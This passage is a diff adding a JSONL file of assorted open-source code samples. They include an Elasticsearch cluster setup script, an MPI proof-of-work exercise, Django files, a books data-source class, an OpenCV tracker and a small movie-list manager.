diff --git "a/2548.jsonl" "b/2548.jsonl" new file mode 100644--- /dev/null +++ "b/2548.jsonl" @@ -0,0 +1,831 @@ +{"seq_id":"367342444","text":"#!/bin/env python3.4\nfrom __future__ import print_function\nimport os,sys,socket\nimport shutil\nimport json\nimport shutil\nimport syslog\nimport time\n\nbackup_dir = '/opt/fff/backup'\ntry:\n os.makedirs(backup_dir)\nexcept:pass\n\nelasticsysconf = '/etc/sysconfig/elasticsearch'\nelasticconf = '/etc/elasticsearch/elasticsearch.yml'\nelasticconfdir = '/etc/elasticsearch'\n#elasticlogconf = '/etc/elasticsearch/logging.yml'\n\nes_cdaq_run2_list = ['ncsrv-c2e42-09-02', 'ncsrv-c2e42-11-02', 'ncsrv-c2e42-13-02', 'ncsrv-c2e42-19-02']\nes_cdaq_list = ['ncsrv-c2e42-21-02', 'ncsrv-c2e42-23-02']\nes_local_list =['ncsrv-c2e42-13-03', 'ncsrv-c2e42-23-03']\n\nes_vm_cdaq_list = ['es-vm-cdaq-01.cern.ch']\nes_vm_local_list =['es-vm-local-01.cern.ch']\n\n\nmyhost = os.uname()[1]\n\ndef getmachinetype():\n\n #print \"running on host \",myhost\n if myhost.startswith('ncsrv-'):\n try:\n es_cdaq_run2_list_ip = socket.gethostbyname_ex('es-cdaq-run2')[2]\n es_cdaq_list_ip = socket.gethostbyname_ex('es-cdaq')[2]\n es_local_list_ip = socket.gethostbyname_ex('es-local')[2]\n\n for es in es_cdaq_run2_list:\n try:\n es_cdaq_run2_list_ip.append(socket.gethostbyname_ex(es)[2][0])\n except Exception as ex:\n print(ex)\n for es in es_cdaq_list:\n try:\n es_cdaq_list_ip.append(socket.gethostbyname_ex(es)[2][0])\n except Exception as ex:\n print(ex)\n for es in es_local_list:\n try:\n es_local_list_ip.append(socket.gethostbyname_ex(es)[2][0])\n except Exception as ex:\n print(ex)\n\n myaddr = socket.gethostbyname(myhost)\n\n if myaddr in es_cdaq_run2_list_ip:\n return 'es','escdaqrun2','prod'\n if myaddr in es_cdaq_list_ip:\n return 'es','escdaq','prod'\n elif myaddr in es_local_list_ip:\n return 'es','eslocal','prod'\n else:\n return 'unknown','unknown'\n except socket.gaierror as ex:\n print('dns lookup error ',str(ex))\n raise ex\n elif myhost.startswith('es-vm-cdaq'):\n return 'es','escdaq','vm'\n elif myhost.startswith('es-vm-local'):\n return 'es','eslocal','vm'\n else:\n print(\"unknown machine type\")\n return 'unknown','unknown','unknown'\n\n\ndef getIPs(hostname):\n try:\n ips = socket.gethostbyname_ex(hostname)\n except socket.gaierror as ex:\n print('unable to get ',hostname,'IP address:',str(ex))\n raise ex\n return ips\n\ndef getTimeString():\n tzones = time.tzname\n if len(tzones)>1:zone=str(tzones[1])\n else:zone=str(tzones[0])\n return str(time.strftime(\"%H:%M:%S\"))+\" \"+time.strftime(\"%d-%b-%Y\")+\" \"+zone\n\n\ndef checkModifiedConfigInFile(file):\n\n f = open(file)\n lines = f.readlines(2)#read first 2\n f.close()\n tzones = time.tzname\n if len(tzones)>1:zone=tzones[1]\n else:zone=tzones[0]\n\n for l in lines:\n if l.strip().startswith(\"#edited by fff meta rpm\"):\n return True\n return False\n\n\n\ndef checkModifiedConfig(lines):\n for l in lines:\n if l.strip().startswith(\"#edited by fff meta rpm\"):\n return True\n return False\n\n\nclass FileManager:\n def __init__(self,fileName,sep,edited,os1='',os2='',recreate=False):\n self.name = fileName\n if recreate==False:\n f = open(fileName,'r')\n self.lines = f.readlines()\n f.close()\n else:\n self.lines=[]\n self.sep = sep\n self.regs = []\n self.remove = []\n self.edited = edited\n #for style\n self.os1=os1\n self.os2=os2\n\n def reg(self,key,val,section=None):\n self.regs.append([key,val,False,section])\n\n def removeEntry(self,key):\n self.remove.append(key)\n\n def commit(self):\n out = []\n #if self.edited == False:\n out.append('#edited by fff meta rpm at '+getTimeString()+'\\n')\n\n #first removing elements\n for rm in self.remove:\n for i,l in enumerate(self.lines):\n if l.strip().startswith(rm):\n del self.lines[i]\n break\n\n for i,l in enumerate(self.lines):\n lstrip = l.strip()\n if lstrip.startswith('#'):\n continue\n\n try:\n key = lstrip.split(self.sep)[0].strip()\n for r in self.regs:\n if r[0] == key:\n self.lines[i] = r[0].strip()+self.os1+self.sep+self.os2+r[1].strip()+'\\n'\n r[2]= True\n break\n except:\n continue\n for r in self.regs:\n if r[2] == False:\n toAdd = r[0]+self.os1+self.sep+self.os2+r[1]+'\\n'\n insertionDone = False\n if r[3] is not None:\n for idx,l in enumerate(self.lines):\n if l.strip().startswith(r[3]):\n try:\n self.lines.insert(idx+1,toAdd)\n insertionDone = True\n except:\n pass\n break\n if insertionDone == False:\n self.lines.append(toAdd)\n for l in self.lines:\n #already written\n if l.startswith(\"#edited by fff meta rpm\"):continue\n out.append(l)\n #print \"file \",self.name,\"\\n\\n\"\n #for o in out: print o\n f = open(self.name,'w+')\n f.writelines(out)\n f.close()\n\n\ndef restoreFileMaybe(fileName):\n try:\n try:\n f = open(fileName,'r')\n lines = f.readlines()\n f.close()\n shouldCopy = checkModifiedConfig(lines)\n except:\n #backup also if file got deleted\n shouldCopy = True\n\n if shouldCopy:\n print(\"restoring \",fileName)\n backuppath = os.path.join(backup_dir,os.path.basename(fileName))\n f = open(backuppath)\n blines = f.readlines()\n f.close()\n if checkModifiedConfig(blines) == False and len(blines)>0:\n shutil.move(backuppath,fileName)\n except Exception as ex:\n print(\"restoring problem: \" , ex)\n pass\n\n#main function\nif __name__ == \"__main__\":\n if len(sys.argv)>1:\n if 'restore'==sys.argv[1]:\n print(\"restoring configuration...\")\n restoreFileMaybe(elasticsysconf)\n restoreFileMaybe(elasticconf)\n sys.exit(0)\n\n cluster,type,env = getmachinetype()\n\n if type == \"escdaqrun2\":\n print(\"ERROR: this should NEVER be installed or run on es-cdaq-run2 cluster! Exiting script.\")\n exit(1)\n\n print(\"running configuration for machine\",os.uname()[1],\"of type\",type,\"in cluster\",cluster)\n\n\n if True:\n\n if env==\"vm\":\n es_publish_host=os.uname()[1]\n else:\n es_publish_host=os.uname()[1]+'.cms'\n\n #print \"will modify sysconfig elasticsearch configuration\"\n #maybe backup vanilla versions\n essysEdited = checkModifiedConfigInFile(elasticsysconf)\n if essysEdited == False:\n #print \"elasticsearch sysconfig configuration was not yet modified\"\n shutil.copy(elasticsysconf,os.path.join(backup_dir,os.path.basename(elasticsysconf)))\n\n esEdited = checkModifiedConfigInFile(elasticconf)\n if esEdited == False:\n shutil.copy(elasticconf,os.path.join(backup_dir,os.path.basename(elasticconf)))\n\n if type == 'eslocal' or type == 'escdaq':\n\n essyscfg = FileManager(elasticsysconf,'=',essysEdited)\n essyscfg.reg('ES_PATH_CONF','/etc/elasticsearch')\n if env=='vm':\n essyscfg.reg('ES_JAVA_OPTS','\"-Xms1G -Xmx1G\"')\n else:\n essyscfg.reg('ES_JAVA_OPTS','\"-Xms30G -Xmx30G\"') #-XX:+PrintFlagsFinal to print all parameters at startup\n #essyscfg.reg('DATA_DIR','/elasticsearch/lib/elasticsearch')\n essyscfg.removeEntry('CONF_FILE')\n essyscfg.removeEntry('ES_HEAP_SIZE')\n essyscfg.commit()\n os.chmod(elasticsysconf,0o664) #fix permissions (readable)\n\n if type == 'eslocal':\n escfg = FileManager(elasticconf,':',esEdited,'',' ',recreate=True)\n escfg.reg('network.publish_host',es_publish_host)\n escfg.reg('network.bind_host','_local_,'+es_publish_host)\n escfg.reg('cluster.name','es-local')\n #escfg.reg('discovery.zen.ping.unicast.hosts',json.dumps(es_local_list))\n escfg.reg('node.master','true')\n escfg.reg('node.data','true')\n escfg.reg('path.logs','/var/log/elasticsearch')\n #escfg.reg('path.data','/elasticsearch/lib/elasticsearch')\n escfg.reg('path.data','/elasticsearch/lib/elasticsearch/es-local')\n escfg.reg('http.cors.enabled','true')\n escfg.reg('http.cors.allow-origin','\"*\"')\n escfg.reg('bootstrap.system_call_filter','false')\n escfg.reg('transport.compress','true')\n escfg.reg('script.max_compilations_rate', '10000/1m')\n escfg.reg('cluster.routing.allocation.disk.watermark.low','92%')\n escfg.reg('cluster.routing.allocation.disk.watermark.high','95%')\n\n #other optimizations:\n #if env!='vm':\n escfg.reg(\"indices.recovery.max_bytes_per_sec\",\"100mb\") #default:40mb\n escfg.reg('thread_pool.write.queue_size','3000') #default:50(?)\n escfg.reg('cluster.routing.allocation.node_concurrent_recoveries','5') #default:2\n escfg.reg('cluster.routing.allocation.node_initial_primaries_recoveries', '5') #default:4\n #escfg.reg('index.translog.flush_threshold_size','4g') #default:512 mb, only es-local,must be template\n #7.0 settings\n #escfg.reg('node.name',myhost)\n if env=='vm':\n escfg.reg('discovery.seed_hosts',json.dumps(es_vm_local_list))\n escfg.reg('cluster.initial_master_nodes',json.dumps(es_vm_local_list))\n else:\n escfg.reg('discovery.seed_hosts',json.dumps(es_local_list))\n escfg.reg('cluster.initial_master_nodes',json.dumps(es_local_list))\n\n escfg.reg('cluster.max_shards_per_node','100000')\n escfg.reg('search.max_buckets','1000000')\n escfg.commit()\n \n #modify logging.yml --> TODO: adjust /etc/elasticsearch/log4j2.properties\n #eslogcfg = FileManager(elasticlogconf,':',esEdited,'',' ')\n #eslogcfg.reg('es.logger.level','INFO')\n #eslogcfg.commit()\n\n if type == 'escdaq':\n escfg = FileManager(elasticconf,':',esEdited,'',' ',recreate=True)\n escfg.reg('network.publish_host',es_publish_host)\n escfg.reg('network.bind_host','_local_,'+es_publish_host)\n escfg.reg('cluster.name','es-cdaq')\n #escfg.reg('discovery.zen.ping.unicast.hosts',json.dumps(es_cdaq_list))\n escfg.reg('node.master','true')\n escfg.reg('node.data','true')\n escfg.reg('path.logs','/var/log/elasticsearch')\n #escfg.reg('path.data','/elasticsearch/lib/elasticsearch')\n escfg.reg('path.data','/elasticsearch/lib/elasticsearch/es-cdaq')\n escfg.reg('http.cors.enabled','true')\n escfg.reg('http.cors.allow-origin','\"*\"')\n #AUTH\n escfg.reg('xpack.security.enabled', 'true')\n escfg.reg('xpack.security.transport.ssl.enabled', 'true')\n escfg.reg('xpack.security.transport.ssl.verification_mode', 'certificate')\n escfg.reg('xpack.security.transport.ssl.keystore.path', 'certs/elastic-certificates.p12')\n escfg.reg('xpack.security.transport.ssl.truststore.path', 'certs/elastic-certificates.p12')\n #escfg.reg('xpack.security.authc.anonymous.roles','[\"superuser\",\"read_anon\",\"write_anon_temp\"]') #permissive\n escfg.reg('xpack.security.authc.anonymous.roles','[\"read_anon\",\"write_anon_temp\"]') #permissive\n escfg.reg('xpack.security.authc.anonymous.authz_exception','true')\n\n escfg.reg('bootstrap.system_call_filter','false')\n escfg.reg('transport.compress','true')\n escfg.reg('action.auto_create_index','.watches,.triggered_watches,.watcher-history-*,.marvel-*')\n escfg.reg('script.max_compilations_rate', '10000/1m')\n escfg.reg(\"action.destructive_requires_name\", 'true')\n escfg.reg('cluster.routing.allocation.disk.watermark.low','92%')\n escfg.reg('cluster.routing.allocation.disk.watermark.high','95%')\n\n #if env!='vm':\n escfg.reg(\"indices.recovery.max_bytes_per_sec\",\"100mb\") #default:40mb\n escfg.reg('thread_pool.write.queue_size','3000') #default:50 (?)\n escfg.reg('cluster.routing.allocation.node_concurrent_recoveries','5') #default:2\n escfg.reg('cluster.routing.allocation.node_initial_primaries_recoveries', '5') #default:4\n #7.0 settings\n #escfg.reg('node.name',myhost)\n if env=='vm':\n escfg.reg('discovery.seed_hosts',json.dumps(es_vm_cdaq_list))\n escfg.reg('cluster.initial_master_nodes',json.dumps(es_vm_cdaq_list))\n else:\n escfg.reg('discovery.seed_hosts',json.dumps(es_cdaq_list))\n escfg.reg('cluster.initial_master_nodes',json.dumps(es_cdaq_list))\n\n escfg.reg('cluster.max_shards_per_node','10000')\n escfg.reg('search.max_buckets','1000000')\n escfg.commit()\n #copy auth config\n shutil.copy2(os.path.join(elasticconfdir,'users.f3'), os.path.join(elasticconfdir,'users'))\n shutil.copy2(os.path.join(elasticconfdir,'users_roles.f3'), os.path.join(elasticconfdir,'users_roles'))\n shutil.copy2(os.path.join(elasticconfdir,'roles.yml.f3'), os.path.join(elasticconfdir,'roles.yml'))\n\n","sub_path":"python/essetupmachine.py","file_name":"essetupmachine.py","file_ext":"py","file_size_in_byte":14196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"646900615","text":"import sys\nimport hashlib\nfrom mpi4py import MPI\n\nbloco = {\n 'tansacoes': [\n 'marcio->tarik:1000 BTC', \n 'tarik->breno:50 BTC',\n 'felipe->marcio:10 BTC',\n 'marcio->tarik:10 BTC',\n 'marcio->marcio:20 BTC',\n ],\n 'id': 1256,\n 'nounce': 0\n}\n\ntempo_ini = MPI.Wtime()\n\ncomm = MPI.COMM_WORLD\nmeu_id = comm.Get_rank()\nqtd_processos = comm.Get_size()\n\nbloco['id'] = sys.argv[1] #Para produzir hashs aleatórios de blocos com ids passados via bash\nqtd_zeros = int(sys.argv[2])\nqtd_testar_total = int(sys.argv[3])\n\nqtd_testar_local = qtd_testar_total // qtd_processos # A faixa de nounces que será testada por cada processo\nnounce_ini = meu_id*qtd_testar_local # O nounce inicial da faixa\nnounce_fin = (meu_id + 1)*qtd_testar_local # O nounce final da faixa\n\nprint(\"Sou o processo\", meu_id, \"e vou testar de\", nounce_ini, \"até\", nounce_fin)\n\nbloco_hash = hashlib.sha256((str(bloco)).encode()).hexdigest()\nif meu_id == 0:\n print(\"Hash inicial\", bloco_hash)\n\n#Executando os testes nas respectivas faixas\nnounce = nounce_ini\nencontrado = False\nid_quem_achou = -1\ncontador = 0\nwhile nounce < nounce_fin and not encontrado:\n bloco['nounce'] = nounce\n bloco_hash = hashlib.sha256((str(bloco)).encode()).hexdigest()\n nounce += 1\n \n contador += 1\n \n #Fazendo o iprobe apenas a cada 1000 iterações, pois ele é demorado\n if contador == 1000:\n encontrado = comm.iprobe(source=MPI.ANY_SOURCE, tag=0)\n contador = 0\n \n if bloco_hash[0:qtd_zeros] == '0'*qtd_zeros:\n encontrado = True\n id_quem_achou = meu_id\n \n #Se o processo finalizou, sem sucesso, os testes na sua faixa de nounces\n #ele inicia testes em uma nova faixa\n if nounce == nounce_fin:\n nounce_ini = nounce_ini + qtd_testar_total\n nounce = nounce_ini\n nounce_fin = nounce_ini + qtd_testar_local\n #print(\"\\nSou o processo\", meu_id, \"e não encontrei nada na faixa anterior\")\n #print(\"agora vou verificar de\", nounce, \"até\", nounce_fin) \n\nif encontrado and meu_id == id_quem_achou:\n print(\"O processo\", meu_id, \"encontrou a prova de trabalho\")\n print(\"Prova de trabalho\", bloco['nounce'])\n \n tempo_fim = MPI.Wtime()\n \n #Informando aos outros processos que o hash foi encontrado\n for i in range(qtd_processos):\n comm.isend(encontrado, dest=i, tag=0)\n \n#Sincronizando para que o tempo possa sempre ser colocado na última\n#posição da lista que será utilizada no colab notebook que executará\n#este código\ncomm.Barrier()\nif meu_id == id_quem_achou:\n print(\"Tempo de execução:\", tempo_fim - tempo_ini)\n \n \n","sub_path":"parallel_pow.py","file_name":"parallel_pow.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"134392278","text":"# (C) Copyright Artificial Brain 2021.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom quantumcat.circuit import QCircuit\nfrom quantumcat.utils import providers, constants\nfrom quantumcat.algorithms import GroversAlgorithm\nfrom quantumcat.applications.generator import RandomNumber\nfrom quantumcat.applications.generator import RandInt\n\ndef create_circuit_demo():\n circuit = QCircuit(6)\n circuit.h_gate(0)\n circuit.x_gate(3)\n circuit.measure_all()\n # circuit.draw_circuit(provider=providers.IBM_PROVIDER)\n print(circuit.execute(provider=providers.IBM_PROVIDER, repetitions=10))\n\n\ndef grovers_demo():\n clause_list_sudoku = [[0, 1], [0, 2], [1, 3], [2, 3]]\n clause_list_light_board = [[0, 1, 3], [1, 0, 2, 4], [2, 1, 5], [3, 0, 4, 6],\n [4, 1, 3, 5, 7], [5, 2, 4, 8], [6, 3, 7], [7, 4, 6, 8],\n [8, 5, 7]]\n\n input_arr = [0, 0, 0, 1, 0, 1, 1, 1, 0]\n\n grovers_algorithm_unknown_solution = GroversAlgorithm(clause_list=clause_list_light_board, input_arr=input_arr,\n flip_output=True, solution_known='N')\n\n grovers_algorithm_known_solution = GroversAlgorithm(solution_known='Y', search_keyword=101)\n\n results = grovers_algorithm_unknown_solution.execute(repetitions=10, provider=providers.IBM_PROVIDER)\n\n # grovers_algorithm_unknown_solution.draw_grovers_circuit()\n print(results)\n\n\ndef random_number_demo():\n random_number = RandInt(provider=providers.GOOGLE_PROVIDER).rand_range(7,11)\n print(random_number)\n\n\ndef run_on_real_device():\n circuit = QCircuit(1)\n circuit.x_gate(0)\n circuit.measure_all()\n # circuit.draw_circuit(provider=providers.GOOGLE_PROVIDER)\n print(circuit.execute(provider=providers.IBM_PROVIDER, repetitions=10,\n api=constants.IBM_API, device=constants.IBM_DEVICE_NAME))\n\n\nif __name__ == '__main__':\n random_number_demo()\n","sub_path":"quantumcat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336498371","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport trippie.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('trips', '0053_auto_20160901_1454'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='tripimagetmp',\n name='image',\n field=models.ImageField(upload_to=trippie.utils.image_path, verbose_name='Image'),\n ),\n ]\n","sub_path":"apps/trips/migrations/0054_auto_20161018_1442.py","file_name":"0054_auto_20161018_1442.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"249427934","text":"#!/usr/bin/env python3\n'''\n booksdatasource.py\n 10/11/2021\n\n Simon Hempel-Costello, Anders Shenholm\n Revised by Simon Hempel-Costello\n'''\n\n\nimport csv\n\nclass Author:\n\n def __init__(self, surname='', given_name='', birth_year=None, death_year=None):\n self.surname = surname\n self.given_name = given_name\n self.birth_year = birth_year\n self.death_year = death_year\n\n def __eq__(self, other):\n ''' For simplicity, we're going to assume that no two authors have the same name. '''\n return self.surname == other.surname and self.given_name == other.given_name\n\n #basic string formatting for the printouts to make my life easy\n def __str__(self) -> str:\n return self.surname + \",\" + self.given_name + \",(\" +str(self.birth_year) + \"-\"+ str(self.death_year) +\")\"\n\n def __repr__(self) -> str:\n return self.__str__()\n\n def given_name(self):\n return self.given_name\n\n def birth_year(self):\n return self.birth_year\n\n def death_year(self):\n return self.death_year\n\n def surname(self):\n return self.surname\n\nclass Book:\n\n def __init__(self, title='', publication_year=None, authors=[]):\n ''' Note that the self.authors instance variable is a list of\n references to Author objects. '''\n self.title = title\n self.publication_year = publication_year\n self.authors = authors\n\n def __eq__(self, other):\n ''' We're going to make the excessively simplifying assumption that\n no two books have the same title, so \"same title\" is the same\n thing as \"same book\". '''\n return self.title == other.title\n\n #basic string formatting for printouts\n def __str__(self) -> str:\n return self.title + \",\" + str(self.publication_year) + \",Author(s):\" + str(self.authors)\n\n def __repr__(self) -> str:\n return self.__str__()\n\n def title(self):\n return self.title\n\n def authors(self):\n return self.authors\n\n def publication_year(self):\n return self.publication_year\n\nclass BooksDataSource:\n\n def __init__(self, books_csv_file_name):\n ''' The books CSV file format looks like this:\n\n title,publication_year,author_description\n\n For example:\n\n All Clear,2010,Connie Willis (1945-)\n \"Right Ho, Jeeves\",1934,Pelham Grenville Wodehouse (1881-1975)\n\n This __init__ method parses the specified CSV file and creates\n suitable instance variables for the BooksDataSource object containing\n a collection of Author objects and a collection of Book objects.\n '''\n #Read in csv file and input it into the two lists\n self.book_list = []\n self.author_list = []\n with open(books_csv_file_name) as file:\n csvreader = csv.reader(file)\n for row in csvreader:\n #take each author entry in the csv file and parse it into a list of authors dealing with the potential for ands\n input_authors = self.parse_authors_from_csv_entry(row[2])\n for a in input_authors:\n if(a not in self.author_list):\n self.author_list.append(a)\n #create a book from the other two parts of the csv, and feed it the list generated from the authors\n input_book = Book(row[0],int(row[1]),input_authors)\n #add the book to the book list\n self.book_list.append(input_book)\n pass\n\n def parse_authors_from_csv_entry(self, input_entry):\n and_substring = ' and '\n and_offset = len(and_substring)\n author_list = []\n if and_substring in input_entry:\n pre_and_substring = input_entry[:input_entry.index(and_substring)]\n post_and_substring = input_entry[input_entry.index(and_substring) + and_offset:]\n #Now we have isolated one author in prestring, generate an author object from this string\n pre_string_author = self.author_from_string(pre_and_substring)\n author_list.append(pre_string_author)\n #Check if post string contains multiple authors, if so recursively splice it into 1, else, just add it to the list\n if(and_substring in post_and_substring):\n author_list.extend(self.parse_authors_from_csv_entry(post_and_substring))\n else:\n post_string_author = self.author_from_string(post_and_substring)\n author_list.append(post_string_author)\n else:\n input_author = self.author_from_string(input_entry)\n\n author_list.append(input_author)\n return author_list\n\n def author_from_string(self, input_string):\n #parsing based on dileneation of spaces, parenthesis and dashes\n last_name = input_string[input_string.index(\" \")+1:input_string.index(\"(\")-1]\n first_name = input_string[:input_string.index(\" \")]\n birth_date = input_string[input_string.index(\"(\")+1 : input_string.index(\"-\")]\n death_date = input_string[input_string.index(\"-\")+1 : input_string.index(\")\")]\n author = Author(surname = last_name, given_name = first_name, birth_year = birth_date, death_year = death_date)\n return author\n\n def authors(self, search_text=None):\n ''' Returns a list of all the Author objects in this data source whose names contain\n (case-insensitively) the search text. If search_text is None, then this method\n returns all of the Author objects. In either case, the returned list is sorted\n by surname, breaking ties using given name (e.g. Ann Brontë comes before Charlotte Brontë).\n '''\n #take your input text\n input_text = ''\n if(search_text!=None):\n input_text = search_text.lower()\n\n output_list = []\n for a in self.author_list:\n full_name = a.given_name.lower() + a.surname.lower()\n #check if the name is this full name\n if(input_text in full_name):\n output_list.append(a)\n\n #okay this is kinda jank, but it seems to work. We just sort the author list by given names first and, \n #since the python sorting algorithm seems to try and maintain relative order when sorting by surname, \n # those with a earlier given name are put first, without any real work on my part. \n #I realize that on a O(n) level, it is probably a terrible method, and there is almost definitely some edge case where it doesn't work\n #but until then im keeping it\n output_list = sorted(output_list, key = lambda author:(author.surname, author.given_name))\n return output_list\n\n def books(self, search_text=None, sort_by='title'):\n ''' Returns a list of all the Book objects in this data source whose\n titles contain (case-insensitively) search_text. If search_text is None,\n then this method returns all of the books objects.\n\n The list of books is sorted in an order depending on the sort_by parameter:\n\n 'year' -- sorts by publication_year, breaking ties with (case-insenstive) title\n 'title' -- sorts by (case-insensitive) title, breaking ties with publication_year\n default -- same as 'title' (that is, if sort_by is anything other than 'year'\n or 'title', just do the same thing you would do for 'title')\n '''\n input_text = ''\n if(search_text!=None):\n input_text = search_text.lower()\n output_list = []\n for b in self.book_list:\n title = b.title.lower()\n if(input_text in title):\n output_list.append(b)\n #sorting books by title or by year given the tag\n if(sort_by == \"year\"):\n output_list = sorted(output_list, key = Book.publication_year)\n else:\n output_list = sorted(output_list, key = Book.title)\n return output_list \n\n def books_between_years(self, start_year=None, end_year=None):\n ''' Returns a list of all the Book objects in this data source whose publication\n years are between start_year and end_year, inclusive. The list is sorted\n by publication year, breaking ties by title (e.g. Neverwhere 1996 should\n come before Thief of Time 1996).\n\n If start_year is None, then any book published before or during end_year\n should be included. If end_year is None, then any book published after or\n during start_year should be included. If both are None, then all books\n should be included.\n '''\n end_date = 1000000 #random future year\n start_date = -1000000 #random past year\n\n #sanitize to make sure we are getting dates, then convert to integers\n try:\n if(end_year != None):\n end_date = int(end_year)\n if(start_year != None):\n start_date = int(start_year)\n except ValueError:\n raise ValueError(\"Integer Numbers must be inputted as dates\")\n if(start_date>end_date):\n raise ValueError(\"Start date must be before end date\")\n output_list = []\n for b in self.book_list:\n #if its within those two dates, add it to the list\n if(b.publication_year>= start_date and b.publication_year <= end_date):\n output_list.append(b)\n output_list = sorted(output_list, key= lambda book: (book.publication_year, book.title)) \n return output_list\n\n def search_books_by_author(self, author):\n output_list = []\n for b in self.all_books():\n if(author in b.authors):\n output_list.append(b.title)\n return output_list\n\n def all_books(self):\n return self.book_list\n\n def all_authors(self):\n return self.author_list\n\n","sub_path":"books/booksdatasource.py","file_name":"booksdatasource.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"164321673","text":"from django.conf.urls import url\n\nfrom views import (\n home_view,\n profile_view,\n )\n\nurlpatterns = [\n url(\n r'^$',\n home_view,\n name='home'),\n url(\n r'^(?P[-\\w\\d]+)$',\n profile_view,\n name='profile'),\n ]\n","sub_path":"newsfeed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"612182560","text":"import cv2\nimport time\nimport sys\nfrom imutils.video import FPS\nimport os\nimport numpy as np\nimport re\n\nclass VirtualStream:\n def __init__(self, numpyFolder):\n self.folder = numpyFolder\n self.np_images = {}\n for image in os.listdir(self.folder):\n if '.npy' in image:\n path = os.path.join(self.folder, image)\n self.np_images[int(re.search(r'\\d+', image).group())] = path\n self.count = 200\n self.end = len(self.np_images) - 1\n \n def grabImage(self):\n image = np.load(self.np_images[self.count])\n self.count += 1\n if self.count >= self.end:\n self.reset()\n return image\n \n def reset(self):\n self.count = 0\n\n\n\n\n\n\ntestData = True\n\n# get video source\ndef getVideo():\n try:\n vs = cv2.VideoCapture(sys.argv[1])\n except:\n print(\"ERROR: Path to video missing from arugument\")\n sys.exit()\n return vs\n\n\n#tracker = cv2.TrackerKCF_create() # openCV tracker api to track objects (specifically KCF tracker)\nroi = None # initilize box used to hi-light objects\nfps = None # inizilize fps of video\n\nif testData != True:\n videoStream = getVideo()\nelse:\n vs = VirtualStream('/Users/user/Desktop/saved_images_2019_6_13-17_49_52')\n\nwhile True:\n # grab new frame\n if testData != True:\n bool_result, frame = videoStream.read()\n else:\n frame = vs.grabImage()\n bool_result = True\n\n \n\n if bool_result == None: # No more frames\n break\n\n if roi == None: # initilize roi\n roi = cv2.selectROI(\"Frame\", frame, fromCenter = False, showCrosshair = True)\n tracker = cv2.TrackerKCF_create()\n test = tracker.init(frame, roi)\n print('roi initilize correctly:',test)\n fps = FPS().start() # currently not being used\n else: # update roi\n bool_updated, box = tracker.update(frame)\n if bool_updated == True:\n (x, y, w, h) = [int(i) for i in box] # box holds new roi coordinates\n pt1 = (x,y)\n pt2 = (x+w, y+h)\n cv2.rectangle(frame, pt1, pt2, (0,255,0), 2)\n if bool_updated == False:\n roi = None\n cv2.destroyAllWindows()\n continue\n \n # we are not currently account for the case when update is false\n # this happens when the object if not longer found\n # ex: object has left frame\n\n fps.update()\n fps.stop()\n\n # display frame wtracith roi\n cv2.imshow('frame', frame)\n key = cv2.waitKey(1) & 0xFF # issue here is that frames are displayed for 1ms... we dont display majority of frames\n\n if key == 'a':\n # this is where we will add the code to add a new roi\n pass\n\n if key == ord('q'):\n break\n\ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"sketches/Tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"200819444","text":"import os\r\nimport json\r\nimport logging\r\n\r\nCUR_DIR = os.path.dirname(__file__)\r\nDATA_FILE = os.path.join(CUR_DIR, \"data\",\"movies.json\")\r\n\r\ndef get_movies():\r\n with open(DATA_FILE,\"r\") as f:\r\n movies_title = json.load(f)\r\n\r\n movies = [Movie(movie_title) for movie_title in movies_title]\r\n return movies\r\n\r\nclass Movie:\r\n def __init__(self,title):\r\n # .title() est la fonctionnalité qui met en majuscule à chaque mot\r\n self.title = title.title()\r\n\r\n # Permet de retourner le titre au lieu de l'adresse memoire de (m)\r\n def __str__(self):\r\n return self.title\r\n\r\n def _get_movies(self):\r\n with open(DATA_FILE,\"r\") as f:\r\n return json.load(f)\r\n\r\n def _write_movies(self, movies):\r\n with open(DATA_FILE,\"w\") as f:\r\n json.dump(movies, f, indent=4)\r\n\r\n def add_to_movies(self):\r\n movies = self._get_movies()\r\n\r\n if self.title not in movies:\r\n movies.append(self.title)\r\n self._write_movies(movies)\r\n return True\r\n else: \r\n logging.warning(f\"Le film {self.title} est déjà enregistré.\")\r\n return False\r\n\r\n def remove_from_movies(self):\r\n movies = self._get_movies()\r\n\r\n if self.title in movies:\r\n movies.remove(self.title)\r\n self._write_movies(movies)\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n movies = get_movies()\r\n print(movies)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"497674618","text":"# -*- coding: utf-8 -*-\n#\n# Author: François Rossigneux \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR 